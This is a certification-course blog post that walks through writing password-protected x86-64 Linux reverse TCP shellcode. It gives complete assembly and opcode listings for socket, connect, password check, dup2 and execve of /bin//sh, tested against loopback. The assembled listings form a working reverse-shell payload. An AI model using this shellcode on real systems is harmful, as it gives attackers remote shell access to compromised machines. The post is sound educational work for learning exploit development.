X64 Linux Reverse TCP Shellcode with Authentication

Jul 25, 2018 | 9 minutes read

Tags: assembly, slae-64, shellcode

This post is the second of seven that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post corresponds to one of the seven assignments, which vary in difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving into OSCE.

The requirements for this assignment are almost identical to Assignment 1, so this post follows the same format. Also, because I’m a lazy programmer (in the good way), I will be reusing certain sections of code from the first assignment.

Assignment #2 Requirements

  • Create reverse TCP shellcode
    • Connects back to configured IP and port
    • Authentication
    • If password is correct, execute the shell
  • Remove null-bytes (0x00) from the reverse TCP shellcode discussed as part of the course and
  • Compress the size of the shellcode as much as possible

General Steps to Callback

If you took a look at my first assignment, you know that it takes quite a few steps to create a bind shell (socket, bind, listen and accept). Thankfully, the networking part of a reverse shell is much simpler and needs only two steps:

  1. socket -> Create a socket
  2. connect -> Attempt to connect to a specified address
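For comparison, here is a minimal Python sketch of those same two steps. The throwaway local listener and the use of port 0 (let the kernel pick a free port) are assumptions added only so the example is self-contained; the shellcode itself connects to a fixed IP and port.

```python
import socket

# Throwaway listener so the example has something to connect back to.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))      # port 0: the kernel chooses a free port
listener.listen(1)
host, port = listener.getsockname()

# Step 1: socket() -> create a TCP socket
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Step 2: connect() -> connect back to the configured IP and port
client.connect((host, port))

conn, peer = listener.accept()
connected = conn.getpeername() == client.getsockname()
print("connected:", connected)

conn.close()
client.close()
listener.close()
```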

Pick a Port and IP

For testing, I used loopback as my IP address and port 4444. We can fire up Python again to prep these values for use in the assembly. If you’re unfamiliar with socket programming, the function name inet_pton may sound a bit cryptic, so I’ll take this opportunity to quote the venerable Beej on the subject of inet_pton and inet_ntop:

These functions (pton and ntop) are for dealing with human-readable IP addresses and converting them to their binary representation for use with various functions and system calls. The “n” stands for “network”, and “p” for “presentation”. Or “text presentation”. But you can think of it as “printable”. “ntop” is “network to printable”.

- Beej

The name htons stands for “host to network short”: it converts a 16-bit value from host byte order to network byte order. Host-to-network conversion is very similar to what’s happening with inet_pton, which also produces its result in network byte order. The conversion is needed because a choice had to be made about the order in which multi-byte values traverse networks, and that choice was big-endian. Little-endian machines (Intel x86 and x86-64, to name one family) store the least significant byte first, so they have to swap those bytes into network byte order before sending data on its way. Endianness is an interesting topic (especially the origin of the term), but a more thorough explanation is beyond the scope of this post.
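A rough sketch of what htons does, using Python’s struct module: pack the value in network byte order, then read those bytes back in host order. The helper name my_htons is hypothetical; it is only meant to illustrate the byte swap and agrees with socket.htons.

```python
import socket
import struct

def my_htons(value: int) -> int:
    """Hypothetical re-implementation of htons, for illustration only."""
    network_bytes = struct.pack("!H", value)      # "!" = network (big-endian) order
    return struct.unpack("=H", network_bytes)[0]  # "=" = native host order

print(hex(my_htons(4444)))                   # 0x5c11 on a little-endian host
print(my_htons(4444) == socket.htons(4444))  # True
```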

>>> import socket
>>> hex(socket.htons(4444))
'0x5c11'
>>> socket.inet_pton(socket.AF_INET, '127.0.0.1')[::-1]  # inet_pton rejects the '127.1' shorthand
b'\x01\x00\x00\x7f'

After we’ve prepped the values, they can be defined at the top of the assembly so we can easily swap in different ones later on.

%define PORTNUMBER  0x5c11
%define IPADDR      0x017f
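To see why these particular immediates are usable, it helps to look at the bytes each one encodes to, since x86-64 stores immediates little-endian. This sketch (helper names are hypothetical) compares the trimmed IPADDR with the full 32-bit value for 127.0.0.1, which would bring null bytes into the shellcode.

```python
def imm_bytes(value: int, width: int) -> bytes:
    """Bytes of an immediate as x86-64 encodes it (little-endian)."""
    return value.to_bytes(width, "little")

def is_null_free(value: int, width: int) -> bool:
    return 0 not in imm_bytes(value, width)

PORTNUMBER = 0x5c11
IPADDR = 0x017f

print(imm_bytes(PORTNUMBER, 2).hex())   # 115c -> port 4444 in network order
print(imm_bytes(IPADDR, 2).hex())       # 7f01
print(imm_bytes(0x0100007f, 4).hex())   # 7f000001 -> two null bytes
print(is_null_free(PORTNUMBER, 2), is_null_free(IPADDR, 2), is_null_free(0x0100007f, 4))
# True True False
```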

Create a Socket

Once again, we start by creating a socket using the socket() syscall. This should look very similar to what was covered in the first assignment. One thing that changed since my first post is that I found that mov reg, reg is one byte longer than push reg; pop reg (mov rdi, rax encodes as 48 89 c7, while push rax; pop rdi is just 50 5f). Once I complete the other assignments, I plan to revisit the earlier ones and apply tricks like this one that I pick up along the way.

#define __NR_socket 41

int socket(int domain, int type, int protocol);
/* rax -> 41 -> socket syscall
 * rdi -> 2 (AF_INET) -> domain
 * rsi -> 1 (SOCK_STREAM) -> type
 * rdx -> 0 -> protocol
 */
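The push imm8; pop reg trick relies on push imm8 (opcode 0x6a) taking a single sign-extended byte, so it only works for values from -128 to 127. The sketch below, with hypothetical helper names, checks that every syscall number used in this post fits, and shows why zero is still cleared with xor instead: push 0x0 would encode a null byte. AF_INET == 2 and SOCK_STREAM == 1 hold on Linux; other platforms may use different values.

```python
import socket

# Syscall numbers from the #define lines in this post (Linux x86-64).
SYSCALLS = {"read": 0, "close": 3, "dup2": 33, "socket": 41, "connect": 42, "execve": 59}

def fits_push_imm8(value: int) -> bool:
    """push imm8 sign-extends one byte, so only -128..127 fit."""
    return -128 <= value <= 127

def push_imm8(value: int) -> bytes:
    """Two-byte encoding of `push imm8` (hypothetical helper)."""
    return bytes([0x6A, value & 0xFF])

# socket(AF_INET, SOCK_STREAM, 0) on Linux
assert socket.AF_INET == 2 and socket.SOCK_STREAM == 1
assert all(fits_push_imm8(n) for n in SYSCALLS.values())

print(push_imm8(41).hex())   # 6a29, matches the listing
print(push_imm8(0).hex())    # 6a00, contains a null: zero is cleared with xor instead
```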

Original shellcode: 25 bytes

0000000000400080 <_start>:
  400080:	b8 29 00 00 00       	mov    eax,0x29
  400085:	bf 02 00 00 00       	mov    edi,0x2
  40008a:	be 01 00 00 00       	mov    esi,0x1
  40008f:	ba 00 00 00 00       	mov    edx,0x0
  400094:	0f 05                	syscall
  400096:	48 89 c7             	mov    rdi,rax

My shellcode: 15 bytes

0000000000400080 <_start>:
  400080:	6a 29                	push   0x29
  400082:	58                   	pop    rax
  400083:	6a 02                	push   0x2
  400085:	5f                   	pop    rdi
  400086:	6a 01                	push   0x1
  400088:	5e                   	pop    rsi
  400089:	31 d2                	xor    edx,edx
  40008b:	0f 05                	syscall

  ; copy socket descriptor to rdi for future use
  40008d:	50                   	push   rax
  40008e:	5f                   	pop    rdi
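A quick way to check the size and null-byte claims is to feed the opcode bytes from the two listings into a small Python helper (stats is a hypothetical name). The hex strings are copied from the disassembly above.

```python
def stats(hexdump: str):
    """Return (size in bytes, number of null bytes) for a hex dump."""
    code = bytes.fromhex(hexdump)   # whitespace between byte pairs is ignored
    return len(code), code.count(0)

original = ("b8 29 00 00 00 bf 02 00 00 00 be 01 00 00 00 "
            "ba 00 00 00 00 0f 05 48 89 c7")
mine = "6a 29 58 6a 02 5f 6a 01 5e 31 d2 0f 05 50 5f"

print(stats(original))   # (25, 13)
print(stats(mine))       # (15, 0)
```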

Populate sockaddr_in Struct

To write the reverse shell, the socket needs to know the IP and port to connect back to. The sockaddr_in struct holds that information; at 16 bytes it is too large to fit in a single 64-bit register, so it is built on the stack.

struct sockaddr_in {
    sa_family_t    sin_family; /* address family: AF_INET */
    in_port_t      sin_port;   /* port in network byte order */
    struct in_addr sin_addr;   /* internet address */
};
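The man page excerpt omits the trailing sin_zero padding, but the full struct is 16 bytes, which is why connect() is given a length of 16. This Python sketch packs the same layout for 127.0.0.1:4444 with the struct module; pack_sockaddr_in is a hypothetical helper, and the byte order of sin_family in the printed output assumes a little-endian host.

```python
import socket
import struct

def pack_sockaddr_in(ip: str, port: int) -> bytes:
    """Hypothetical helper: build a 16-byte struct sockaddr_in."""
    sin_family = struct.pack("=H", socket.AF_INET)   # host byte order
    sin_port = struct.pack("!H", port)               # network byte order
    sin_addr = socket.inet_pton(socket.AF_INET, ip)  # already network byte order
    sin_zero = bytes(8)                              # padding up to 16 bytes
    return sin_family + sin_port + sin_addr + sin_zero

addr = pack_sockaddr_in("127.0.0.1", 4444)
print(len(addr), addr.hex())   # 16 0200115c7f0000010000000000000000 (little-endian host)
```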

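You may have noticed that I used 127.1 as my loopback IP. Only the first two bytes of the address, 0x7f and 0x01, are written (as the WORD 0x017f), and the remaining two bytes of sin_addr come from the zeros already on the stack, so the instruction contains no nulls. Strictly speaking, the address that ends up in the struct is 127.1.0.0 rather than 127.0.0.1, but every address in 127.0.0.0/8 is loopback, so the connection still reaches the local listener. There are other valid ways of representing IPv4 addresses as well, such as a single 32-bit integer: 127.0.0.1 is 2130706433 (0x7f000001), so ping 2130706433 pings loopback.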
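Python’s standard library can confirm these alternative spellings. A minimal check, assuming Python 3’s ipaddress and socket modules: the integer form, the 127.1 shorthand as inet_aton parses it (it reads it as 127.0.0.1, with the last part filling the low 24 bits), and the fact that all of 127.0.0.0/8 counts as loopback.

```python
import ipaddress
import socket

# A single 32-bit integer is another valid spelling of 127.0.0.1.
print(ipaddress.IPv4Address(2130706433))                            # 127.0.0.1
print(hex(int(ipaddress.IPv4Address("127.0.0.1"))))                 # 0x7f000001

# inet_aton accepts the "127.1" shorthand and reads it as 127.0.0.1.
print(socket.inet_aton("127.1") == socket.inet_aton("127.0.0.1"))   # True

# The whole 127.0.0.0/8 block is loopback, 127.1.0.0 included.
print(ipaddress.IPv4Address("127.1.0.0").is_loopback)               # True
```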


Original shellcode: 33 bytes

400099:	48 31 c0             	xor    rax,rax
40009c:	50                   	push   rax
40009d:	c7 44 24 fc 7f 00 00 	mov    DWORD PTR [rsp-0x4],0x100007f
4000a4:	01
4000a5:	66 c7 44 24 fa 11 5c 	mov    WORD PTR [rsp-0x6],0x5c11
4000ac:	66 c7 44 24 f8 02 00 	mov    WORD PTR [rsp-0x8],0x2
4000b3:	48 83 ec 08          	sub    rsp,0x8
4000bc:	48 89 e6             	mov    rsi,rsp

My shellcode: 23 bytes

000000000040008f <populate_sockaddr_in>:
  ; assumption: rax contains result of socket syscall, use it to
  ; zero out rdx via sign extension (cdq)
  40008f:	99                   	cdq    
  400090:	52                   	push   rdx
  400091:	52                   	push   rdx
  400092:	66 c7 44 24 04 7f 01 	mov    WORD PTR [rsp+0x4],0x17f
  400099:	66 c7 44 24 02 11 5c 	mov    WORD PTR [rsp+0x2],0x5c11
  4000a0:	c6 04 24 02          	mov    BYTE PTR [rsp],0x2
  4000a4:	54                   	push   rsp
  4000a5:	5e                   	pop    rsi
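To double-check the struct this snippet builds, the following Python sketch replays the three stores onto 16 zeroed bytes (the two push rdx) and decodes the result. It models memory only, not registers; the little-endian stores ("<") mirror what x86-64 does.

```python
import ipaddress
import struct

stack = bytearray(16)                       # push rdx ; push rdx  (rdx == 0)
struct.pack_into("<H", stack, 4, 0x017f)    # mov WORD PTR [rsp+0x4], 0x17f
struct.pack_into("<H", stack, 2, 0x5c11)    # mov WORD PTR [rsp+0x2], 0x5c11
struct.pack_into("<B", stack, 0, 0x02)      # mov BYTE PTR [rsp], 0x2

family = struct.unpack_from("<H", stack, 0)[0]   # sin_family (host order)
port = struct.unpack_from("!H", stack, 2)[0]     # sin_port (network order)
addr = ipaddress.IPv4Address(bytes(stack[4:8]))  # sin_addr
print(family, port, addr)                        # 2 4444 127.1.0.0
```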

Connect (the callback)

The connect() system call connects the socket referred to by the file descriptor sockfd to the address specified by addr.

#define __NR_connect 42

int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
/* rax -> 42
 * rdi -> already contains the socket fd
 * rsi -> already contains pointer to sockaddr_in with IP:PORT
 * rdx -> length of sockaddr_in (16)
 */

Original shellcode: 12 bytes

4000b7:	b8 2a 00 00 00       	mov    eax,0x2a
4000bf:	ba 10 00 00 00       	mov    edx,0x10
4000c4:	0f 05                	syscall

My shellcode: 8 bytes

00000000004000a6 <connect_call>:
  4000a6:	6a 2a                	push   0x2a
  4000a8:	58                   	pop    rax
  4000a9:	6a 10                	push   0x10
  4000ab:	5a                   	pop    rdx
  4000ac:	0f 05                	syscall

Read in the Password

The next few sections are almost identical to my post for the first assignment. If you’d like a more in-depth analysis of the following snippets of code, please head there and take a look. The only real difference is that I started using push reg; pop reg instead of mov reg, reg. That change makes some of these snippets a few bytes shorter, but for the most part they’re the same.

#define __NR_read 0

ssize_t read(int fd, void *buf, size_t count);
/* rax -> 0
 * rdi -> socket fd, already stored in rdi
 * rsi -> pointer to a 24-byte buffer on the stack (should be plenty)
 * rdx -> 24 (maximum number of bytes to read)
 */

My shellcode (read + compare, no counterpart in the original): 36 bytes

00000000004000ae <read_call>:
  4000ae:	31 c0                	xor    eax,eax
  4000b0:	48 83 ec 18          	sub    rsp,0x18               ; allocate space on the stack
  4000b4:	54                   	push   rsp                    
  4000b5:	5e                   	pop    rsi                    
  4000b6:	6a 18                	push   0x18
  4000b8:	5a                   	pop    rdx
  4000b9:	0f 05                	syscall                       ; <-- user input stored at [rsi]

00000000004000bb <compare>:
  4000bb:	57                   	push   rdi    
  4000bc:	41 59                	pop    r9                     ; save socket fd
  4000be:	48 b8 6c 65 74 6d 65 	movabs rax,0xa6e69656d74656c  ; letmein\n
  4000c5:	69 6e 0a
  4000c8:	48 8d 3e             	lea    rdi,[rsi]
  4000cb:	48 af                	scas   rax,QWORD PTR es:[rdi]
  4000cd:	41 51                	push   r9                     
  4000cf:	5f                   	pop    rdi                    ; restore socket fd

  ; if password isn't right, close the socket
  4000d0:	75 2e                	jne    400100 <close_call>
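The comparison boils down to checking the first 8 bytes read from the socket against the immediate loaded by movabs, which is “letmein\n” stored little-endian. Below is a Python model of that check; password_ok is a hypothetical name, and treating input shorter than 8 bytes as a mismatch is a simplification, since the real code would compare against whatever bytes were already on the stack. One consequence is visible in the model: anything after the first 8 bytes is ignored.

```python
import struct

PASSWORD_QWORD = 0x0A6E69656D74656C   # movabs rax, 0xa6e69656d74656c

def password_ok(received: bytes) -> bool:
    """Model of `scas rax, QWORD PTR [rdi]` followed by `jne close_call`."""
    if len(received) < 8:
        return False   # simplification, see the note above
    return struct.unpack_from("<Q", received, 0)[0] == PASSWORD_QWORD

print(PASSWORD_QWORD.to_bytes(8, "little"))   # b'letmein\n'
print(password_ok(b"letmein\n"))              # True
print(password_ok(b"letmein\nextra"))         # True: only 8 bytes are compared
print(password_ok(b"letmeout\n"))             # False
```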

Duplicate File Descriptors

Just like the bind shell, we now need to duplicate the file descriptors so that stdin, stdout and stderr (0, 1 and 2) all refer to the socket.

#define __NR_dup2 33

int dup2(int oldfd, int newfd);
/* rax -> 33
 * rdi -> socket fd
 * rsi -> 2 -> 1 -> 0 (3 iterations)
 */

Original shellcode: 36 bytes

4000c6:	b8 21 00 00 00       	mov    eax,0x21
4000cb:	be 00 00 00 00       	mov    esi,0x0
4000d0:	0f 05                	syscall
4000d2:	b8 21 00 00 00       	mov    eax,0x21
4000d7:	be 01 00 00 00       	mov    esi,0x1
4000dc:	0f 05                	syscall
4000de:	b8 21 00 00 00       	mov    eax,0x21
4000e3:	be 02 00 00 00       	mov    esi,0x2
4000e8:	0f 05                	syscall

My shellcode: 20 bytes

00000000004000d2 <dup2_calls>:
  4000d2:	6a 03                	push   0x3
  4000d4:	59                   	pop    rcx                    ; loop counter
  4000d5:	6a 02                	push   0x2
  4000d7:	5b                   	pop    rbx                    ; used as file descriptor

00000000004000d8 <dup2_loop>:
  4000d8:	6a 21                	push   0x21
  4000da:	58                   	pop    rax
  4000db:	89 de                	mov    esi,ebx                ; 2 -> 1 -> 0
  4000dd:	51                   	push   rcx                    ; save loop counter (syscall clobbers rcx)
  4000de:	0f 05                	syscall
  4000e0:	59                   	pop    rcx                    ; restore loop counter
  4000e1:	48 ff cb             	dec    rbx
  4000e4:	e2 f2                	loop   4000d8 <dup2_loop>
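The loop relies on the loop instruction decrementing rcx and jumping back while it is nonzero, with rbx counting down separately as the newfd argument. A small Python simulation of just the counters (the function name is hypothetical) shows which descriptors get duplicated.

```python
def dup2_sequence() -> list:
    """Simulate the counters in dup2_loop and return the newfd of each call."""
    rcx = 3            # push 0x3 ; pop rcx -> loop counter
    rbx = 2            # push 0x2 ; pop rbx -> file descriptor
    newfds = []
    while True:
        newfds.append(rbx)   # mov esi, ebx ; syscall -> dup2(sockfd, esi)
        rbx -= 1             # dec rbx
        rcx -= 1             # loop: decrement rcx ...
        if rcx == 0:         # ... and fall through once it reaches zero
            break
    return newfds

print(dup2_sequence())   # [2, 1, 0]
```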

Exec /bin/sh

Finally, it’s time to execve() our shell. Once again, the only appreciable difference between this snippet and the corresponding section from the first assignment is the method used to move data between two registers. Also included here is the close_call label, which marks where to jump when the user provides an incorrect password.

#define __NR_execve 59

int execve(const char *filename, char *const argv[], char *const envp[]);
/* rax -> 59
 * rdi -> "/bin//sh", 0x0
 * rsi -> [addr of "/bin//sh"], 0x0
 * rdx -> 0x0
 */
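The movabs immediate is simply the string “/bin//sh” read as a little-endian QWORD. The extra slash pads the path to exactly 8 bytes so no null is needed inside the immediate; the terminating zero comes from the register pushed just before it, and the kernel treats repeated slashes as a single separator. A quick Python check, using posixpath.normpath only to illustrate the slash collapsing:

```python
import posixpath

path = (0x68732F2F6E69622F).to_bytes(8, "little")   # movabs rbx, 0x68732f2f6e69622f
print(path)                                          # b'/bin//sh'
print(0 in path)                                     # False: no null inside the immediate
print(posixpath.normpath(path.decode()))             # /bin/sh
```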

#define __NR_close 3

int close(int fd);
/* rax -> 3
 * rdi -> fd already stored in rdi
 */

Original shellcode: 32 bytes

4000ea:	48 31 c0             	xor    rax,rax
4000ed:	50                   	push   rax
4000ee:	48 bb 2f 62 69 6e 2f 	movabs rbx,0x68732f2f6e69622f
4000f5:	2f 73 68
4000f8:	53                   	push   rbx
4000f9:	48 89 e7             	mov    rdi,rsp
4000fc:	50                   	push   rax
4000fd:	48 89 e2             	mov    rdx,rsp
400100:	57                   	push   rdi
400101:	48 89 e6             	mov    rsi,rsp
400104:	48 83 c0 3b          	add    rax,0x3b
400108:	0f 05                	syscall

My shellcode: 31 bytes (26 for execve plus 5 for the close fallback)

00000000004000e6 <exec_call>:
  4000e6:	31 d2                	xor    edx,edx
  4000e8:	52                   	push   rdx
  4000e9:	48 bb 2f 62 69 6e 2f 	movabs rbx,0x68732f2f6e69622f
  4000f0:	2f 73 68
  4000f3:	53                   	push   rbx
  4000f4:	54                   	push   rsp
  4000f5:	5f                   	pop    rdi
  4000f6:	52                   	push   rdx
  4000f7:	57                   	push   rdi
  4000f8:	54                   	push   rsp
  4000f9:	5e                   	pop    rsi
  4000fa:	48 8d 42 3b          	lea    rax,[rdx+0x3b]
  4000fe:	0f 05                	syscall

0000000000400100 <close_call>:
  400100:	6a 03                	push   0x3
  400102:	58                   	pop    rax
  400103:	0f 05                	syscall

The end… for now

Here we have a functional password-protected reverse shell. There are no nulls in the code, and even after adding authentication, my shellcode ended up slightly smaller than the original, which has no authentication at all.

  • Original shellcode: 138 bytes
  • My shellcode: 133 bytes
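The totals can be cross-checked by summing the per-section sizes, counted from the bytes in each disassembly listing (my execve section includes the 5-byte close fallback, and the read + compare section has no counterpart in the original).

```python
original = {"socket": 25, "sockaddr_in": 33, "connect": 12, "dup2": 36, "execve": 32}
mine = {"socket": 15, "sockaddr_in": 23, "connect": 8, "read + compare": 36,
        "dup2": 20, "execve + close": 31}

print(sum(original.values()), sum(mine.values()))   # 138 133
```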

I’m looking forward to the egghunter assignment that is coming up next!

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: E64-1584
My SLAE-64 Assignments Repository
